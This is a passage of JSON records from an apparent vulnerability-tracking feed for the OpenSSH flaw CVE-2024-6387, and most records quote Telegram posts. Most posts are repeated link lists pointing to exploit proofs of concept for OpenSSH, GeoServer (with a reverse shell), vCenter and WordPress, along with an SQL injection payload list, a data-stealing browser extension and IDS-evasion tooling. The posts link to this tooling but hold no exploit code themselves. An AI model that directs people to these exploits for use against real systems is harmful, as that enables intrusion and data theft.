personalidade.\n\nhttps://github.com/Pr0teus/malandres-lingo\n\nGitHub - LukeSmithxyz/emailwiz: Script that installs/configures a Dovecot, Postfix, Spam Assassin, OpenDKIM Debian web server\n\nhttps://github.com/LukeSmithxyz/emailwiz\n\nGitHub - hahwul/authz0: \ud83d\udd11 Authz0 is an automated authorization test tool. Unauthorized access can be identified based on URLs and Roles & Credentials.\n\nhttps://github.com/hahwul/authz0\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-12T10:15:00.000000Z"}, {"uuid": "56683917-fcdd-4d41-82b6-5e3c3c128223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/5lwIiVRlGValAb7a3y7unGCeHw0VejzNjVdua0u49Ev9FgE", "content": "", "creation_timestamp": "2025-01-20T16:00:09.000000Z"}, {"uuid": "6bcc5cf8-1ae6-4ea3-b76a-c02be171b9fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8212", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "8f9b9e4e-4846-4f50-9cf9-ed7e28f9a0f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8143", "content": "Tools - Hackers Factory\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nPrivilege Escalation Enumeration Script for Windows\n\nhttps://github.com/itm4n/PrivescCheck\n\nTwo new offensive techniques using Windows Fibers: PoisonFiber (The first remote enumeration & Fiber injection capability POC tool) PhantomThread (An evolved callstack-masking implementation)\n\nhttps://github.com/JanielDary/ImmoralFiber\n\nStatic deobfuscator for Themida/WinLicense/Code Virtualizer's mutation-based obfuscation.\n\nhttps://github.com/ergrelet/themida-unmutate\n\nExample code samples from our ScriptBlock Smuggling Blog post\n\nhttps://github.com/BC-SECURITY/ScriptBlock-Smuggling\n\nRusty Hypervisor - Windows UEFI Blue Pill Type-1 Hypervisor in Rust (Codename: Illusion)\n\nhttps://github.com/memN0ps/illusion-rs\n\nThis Burp Suite extension allows you to copy HTTP requests without including cookies or tokens. It removes sensitive information related to authentication, session management, and CSRF protection from the requests, making it easier to share or analyze them without exposing sensitive data.\n\nhttps://github.com/haticeerturk/requestCleaner\n\nGitHub - pl4int3xt/cve_2024_0044: CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13 -\n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nZyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection CVE-2024-29973\n\nhttps://github.com/momika233/CVE-2024-29973\n\nSudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing advanced automated reconnaissance (framework). This tool can also be used for OSINT (Open-source intelligence) activities.\n\nhttps://github.com/screetsec/Sudomy\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-04T09:43:38.000000Z"}, {"uuid": "9cb07317-930b-49f2-8fee-376731cbf8f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8134", "content": "Tools - Hackers Factory\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nOSED Material (Offensive Security Exploit Developer) \n\nhttps://github.com/epi052/osed-scripts\n\nhttps://github.com/nop-tech/OSED\n\nExploitation-course OSED\n\nhttps://github.com/ashemery/exploitation-course\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can.\n\nhttps://github.com/classvsoftware/spy-extension\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nGitHub - blackhillsinfosec/skyhook: A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.\n\nhttps://github.com/blackhillsinfosec/skyhook\n\nRed-Team-Management/Red Team Courses\n\nhttps://github.com/CyberSecurityUP/Red-Team-Management/blob/main/Red%20Team%20Courses.md\n\nA CVE-2021-34527 (a.k.a PrintNightmare) Python Scanner\n\nhttps://github.com/byt3bl33d3r/ItWasAllADream\n\nDOME: A subdomain enumeration tool\n\nDownload: github.com/v4d1/Dome\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-03T09:29:11.000000Z"}, {"uuid": "847d2727-37e8-4d80-82d9-3e9d967d403e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8159", "content": "Tools - Hackers Factory\n\nGitHub - EvilBytecode/Bloxstrap-Persistance: Bloxstrap-Persistance modifies Bloxstrap's settings (Settings.json) to add persistent integrations, showcasing how applications can be exploited.\n\nhttps://github.com/EvilBytecode/Bloxstrap-Persistance\n\nGitHub - techgaun/github-dorks: Find leaked secrets via github search\n\nhttps://github.com/techgaun/github-dorks\n\nGitHub - lachlan2k/phatcrack: Modern web-based distributed hashcracking solution, built on hashcat\n\nhttps://github.com/lachlan2k/phatcrack\n\nGitHub - MatheuZSecurity/ModTracer: ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\nGitHub - omrikiei/ktunnel: A cli that exposes your local resources to kubernetes\n\nhttps://github.com/omrikiei/ktunnel\n\nGitHub - BrandonLynch2402/cve-2024-6387-nuclei-template\n\nhttps://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template\n\nGitHub - D3Ext/WEF: Wi-Fi Exploitation Framework\n\nhttps://github.com/D3Ext/WEF\n\nGitHub - spyboy-productions/omnisci3nt: Unveiling the Hidden Layers of the Web \u2013 A Comprehensive Web Reconnaissance Tool\n\nhttps://github.com/spyboy-productions/omnisci3nt\n\nGitHub - WerWolv/ImHex: \ud83d\udd0d A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.\n\nhttps://github.com/WerWolv/ImHex\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can\n\nhttps://github.com/classvsoftware/spy-extension\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-06T14:48:28.000000Z"}, {"uuid": "300fa5d4-7533-48bd-996e-32f0a93ae0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/Leak_DBMS/842", "content": "https://github.com/l0n3m4n/CVE-2024-6387", "creation_timestamp": "2024-07-02T22:11:38.000000Z"}, {"uuid": "afd2326a-4d73-4824-930e-2c924ada6c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/-0W6UpSvj9gDH5QhbLau4U8suzR8VCk_2tSWCSggZrHflKtD", "content": "", "creation_timestamp": "2024-11-02T10:46:50.000000Z"}, {"uuid": "7d454cb5-10dd-4b23-a540-420403d5d288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/O9_nEYAyy7TLTofO-Xbqw6pn0F3QW8BrWuuFaZGhY1knYhsG", "content": "", "creation_timestamp": "2024-11-02T17:31:49.000000Z"}, {"uuid": "8d0a2174-3c14-4004-80a5-df279ad41d33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3405", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:42.000000Z"}, {"uuid": "5caa6a07-7c83-4261-b952-5e622e3d24a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3396", "content": "Tools - Hackers Factory\n\nGitHub - EvilBytecode/Bloxstrap-Persistance: Bloxstrap-Persistance modifies Bloxstrap's settings (Settings.json) to add persistent integrations, showcasing how applications can be exploited.\n\nhttps://github.com/EvilBytecode/Bloxstrap-Persistance\n\nGitHub - techgaun/github-dorks: Find leaked secrets via github search\n\nhttps://github.com/techgaun/github-dorks\n\nGitHub - lachlan2k/phatcrack: Modern web-based distributed hashcracking solution, built on hashcat\n\nhttps://github.com/lachlan2k/phatcrack\n\nGitHub - MatheuZSecurity/ModTracer: ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\nGitHub - omrikiei/ktunnel: A cli that exposes your local resources to kubernetes\n\nhttps://github.com/omrikiei/ktunnel\n\nGitHub - BrandonLynch2402/cve-2024-6387-nuclei-template\n\nhttps://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template\n\nGitHub - D3Ext/WEF: Wi-Fi Exploitation Framework\n\nhttps://github.com/D3Ext/WEF\n\nGitHub - spyboy-productions/omnisci3nt: Unveiling the Hidden Layers of the Web \u2013 A Comprehensive Web Reconnaissance Tool\n\nhttps://github.com/spyboy-productions/omnisci3nt\n\nGitHub - WerWolv/ImHex: \ud83d\udd0d A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.\n\nhttps://github.com/WerWolv/ImHex\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can\n\nhttps://github.com/classvsoftware/spy-extension\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-06T08:33:30.000000Z"}, {"uuid": "fb851c28-14c1-48f4-ad4b-9eee177e78e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3403", "content": "Tools - Hackers Factory \n\nGitHub - filipi86/CVE-2024-6387-Vulnerability-Checker: This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\n\nhttps://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker\n\nAuto-Gmail-Creator\n\nhttps://github.com/ai-to-ai/Auto-Gmail-Creator\n\nMalwoverview 6.0.0 has been released:\n\nhttps://github.com/alexandreborges/malwoverview\n\nGitHub - skewyapp/skewyapp: Tool to prevent eavesdropping and ultrasonic access of your smart phone.\n\nhttps://github.com/skewyapp/skewyapp\n\nk8s-sniff-https\n\nA simple mitmproxy blueprint to intercept HTTPS traffic from apps running on Kubernetes\n\n\u2192 Reverse engineer API calls or debug third party apps that performs HTTPS calls to remote SaaS backends\n\nhttps://github.com/ofirc/k8s-sniff-https\n\nGitHub - testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nhttps://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nGitHub - Pr0teus/malandres-lingo: Corretores ortogr\u00e1ficos s\u00e3o \u00f3timos para corrigir erros de digita\u00e7\u00e3o, mas tamb\u00e9m podem ser usados para alterar a nossa forma de escrever, de forma mascarar nossa personalidade.\n\nhttps://github.com/Pr0teus/malandres-lingo\n\nGitHub - LukeSmithxyz/emailwiz: Script that installs/configures a Dovecot, Postfix, Spam Assassin, OpenDKIM Debian web server\n\nhttps://github.com/LukeSmithxyz/emailwiz\n\nGitHub - hahwul/authz0: \ud83d\udd11 Authz0 is an automated authorization test tool. Unauthorized access can be identified based on URLs and Roles & Credentials.\n\nhttps://github.com/hahwul/authz0\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-12T16:15:24.000000Z"}, {"uuid": "85f21c3d-3fce-401d-b9b9-20f9bbbfa4ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3380", "content": "Tools - Hackers Factory\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nPrivilege Escalation Enumeration Script for Windows\n\nhttps://github.com/itm4n/PrivescCheck\n\nTwo new offensive techniques using Windows Fibers: PoisonFiber (The first remote enumeration & Fiber injection capability POC tool) PhantomThread (An evolved callstack-masking implementation)\n\nhttps://github.com/JanielDary/ImmoralFiber\n\nStatic deobfuscator for Themida/WinLicense/Code Virtualizer's mutation-based obfuscation.\n\nhttps://github.com/ergrelet/themida-unmutate\n\nExample code samples from our ScriptBlock Smuggling Blog post\n\nhttps://github.com/BC-SECURITY/ScriptBlock-Smuggling\n\nRusty Hypervisor - Windows UEFI Blue Pill Type-1 Hypervisor in Rust (Codename: Illusion)\n\nhttps://github.com/memN0ps/illusion-rs\n\nThis Burp Suite extension allows you to copy HTTP requests without including cookies or tokens. It removes sensitive information related to authentication, session management, and CSRF protection from the requests, making it easier to share or analyze them without exposing sensitive data.\n\nhttps://github.com/haticeerturk/requestCleaner\n\nGitHub - pl4int3xt/cve_2024_0044: CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13 -\n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nZyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection CVE-2024-29973\n\nhttps://github.com/momika233/CVE-2024-29973\n\nSudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing advanced automated reconnaissance (framework). This tool can also be used for OSINT (Open-source intelligence) activities.\n\nhttps://github.com/screetsec/Sudomy\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-04T09:37:27.000000Z"}, {"uuid": "98a61ce4-baa2-4e90-a17a-0ce17a286b7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3373", "content": "Tools - Hackers Factory\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nOSED Material (Offensive Security Exploit Developer) \n\nhttps://github.com/epi052/osed-scripts\n\nhttps://github.com/nop-tech/OSED\n\nExploitation-course OSED\n\nhttps://github.com/ashemery/exploitation-course\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can.\n\nhttps://github.com/classvsoftware/spy-extension\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nGitHub - blackhillsinfosec/skyhook: A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.\n\nhttps://github.com/blackhillsinfosec/skyhook\n\nRed-Team-Management/Red Team Courses\n\nhttps://github.com/CyberSecurityUP/Red-Team-Management/blob/main/Red%20Team%20Courses.md\n\nA CVE-2021-34527 (a.k.a PrintNightmare) Python Scanner\n\nhttps://github.com/byt3bl33d3r/ItWasAllADream\n\nDOME: A subdomain enumeration tool\n\nDownload: github.com/v4d1/Dome\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-03T09:46:36.000000Z"}, {"uuid": "ea932458-11a3-4d9f-820d-f7c4bfa363a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/dilagrafie/3379", "content": "\u26a1 #VULNERABILITIES\n\nMillions of OpenSSH servers could be vulnerable to unauthenticated remote code execution due to a vulnerability tracked as regreSSHion and CVE-2024-6387.", "creation_timestamp": "2024-07-03T14:37:43.000000Z"}, {"uuid": "6563eef6-e3b5-4c43-a629-52c83c50e4e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/n6Rkys7uN4gNv-djj7mGIhfTHt8Whc5wVURliAC852johmPR", "content": "", "creation_timestamp": "2024-11-02T09:35:50.000000Z"}, {"uuid": "84ce7711-2cd9-4846-9476-65558d0789be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6918", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "79800f5f-1e03-4139-a995-9348914427bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/Y95owLsQt0zlb1Y0EipRra74Ul5cMFzjPIkZVh0qifnQaZE", "content": "", "creation_timestamp": "2024-07-03T12:36:46.000000Z"}, {"uuid": "b66811df-37ed-48d8-95fe-32e1745e0965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/lKYW1Swu72pMyC661gvOefKETTmUBTgiY3QQ5kCGl2TspnE", "content": "", "creation_timestamp": "2024-07-03T12:10:14.000000Z"}, {"uuid": "e961bc0f-7314-4e76-8005-a3a9042e141f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/q_nKj8YTucCPWwgSYw9hdB1LM6F3uimBcVZEttfq_IFNVuk", "content": "", "creation_timestamp": "2024-07-18T12:44:29.000000Z"}, {"uuid": "eb728e67-8bd9-4d42-80b1-47bf778c0df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/EswyQsxmrShZr6ClYTTeFLsmrdBW1lHmAjwKBDNCefNAEu0", "content": "", "creation_timestamp": "2024-07-18T12:44:29.000000Z"}, {"uuid": "cc44971f-abfa-4a97-b63c-fcec302a2ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6854", "content": "Tools - Hackers Factory\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nOSED Material (Offensive Security Exploit Developer) \n\nhttps://github.com/epi052/osed-scripts\n\nhttps://github.com/nop-tech/OSED\n\nExploitation-course OSED\n\nhttps://github.com/ashemery/exploitation-course\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can.\n\nhttps://github.com/classvsoftware/spy-extension\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nGitHub - blackhillsinfosec/skyhook: A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.\n\nhttps://github.com/blackhillsinfosec/skyhook\n\nRed-Team-Management/Red Team Courses\n\nhttps://github.com/CyberSecurityUP/Red-Team-Management/blob/main/Red%20Team%20Courses.md\n\nA CVE-2021-34527 (a.k.a PrintNightmare) Python Scanner\n\nhttps://github.com/byt3bl33d3r/ItWasAllADream\n\nDOME: A subdomain enumeration tool\n\nDownload: github.com/v4d1/Dome\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-03T09:29:11.000000Z"}, {"uuid": "963f2d35-697a-427c-9445-4f8c3a78994b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/401", "content": "CVE-2024-6387: \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 RCE \u00abregreSSHion\u00bb\n*\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c\n*", "creation_timestamp": "2024-07-03T17:52:09.000000Z"}, {"uuid": "4eb5c789-b5a9-4b7d-ac8d-88fb462c01a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/proxy_bar/2144", "content": "FreeBSD  \u044d\u0442\u043e \u0432\u0430\u043c \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e OS, \u044d\u0442\u043e \u043a\u0440\u0443\u0442\u043e \u0438 \u0441\u0442\u0438\u043b\u044c\u043d\u043e,  \u0430 \u0442\u0435 \u043a\u0442\u043e \u0432\u0430\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0447\u0442\u043e \u0442\u0430\u043c \u043d\u0435\u0442 docker, \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u0443\u043c\u0435\u0435\u0442 \u0432 jail\\\u0437\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u0432\u043e\u0442 \u044d\u0442\u043e \u0432\u043e\u0442 \u0432\u0441\u0435.\n\u041a\u0442\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u0432\u0441\u0435\u043c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 OpenSSH ? \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0437 OpenBSD ! \n\u041f\u043e\u0447\u0435\u043c\u0443 \u0432 BSD \u043d\u0435\u0442 \u043f\u0440\u043e\u0433\u0440\u0435\u043c\u0435\u0432\u0448\u0435\u0439 CVE-2024-6387 ? glib  \u0434\u0430, \u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u0442\u0430\u043c \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043b\u044e\u0431\u044f\u0442 )))\n*\n\u041d\u0435 \u0434\u043b\u044f \u043a\u043e\u0433\u043e \u043d\u0435 \u0441\u0435\u043a\u0440\u0435\u0442, \u0447\u0442\u043e \u0434\u043e\u043b\u044f \u0440\u044b\u043d\u043a\u0430 BSD, \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 15 \u043b\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e \u0443\u043f\u0430\u043b\u0430,\n*\n\u041d\u041e \u0441\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0440\u0430\u043d\u043e.\n*\n\u0412\u043e \u0441\u043b\u0430\u0432\u0443 \u0441\u0438\u0441\u0442\u0435\u043c 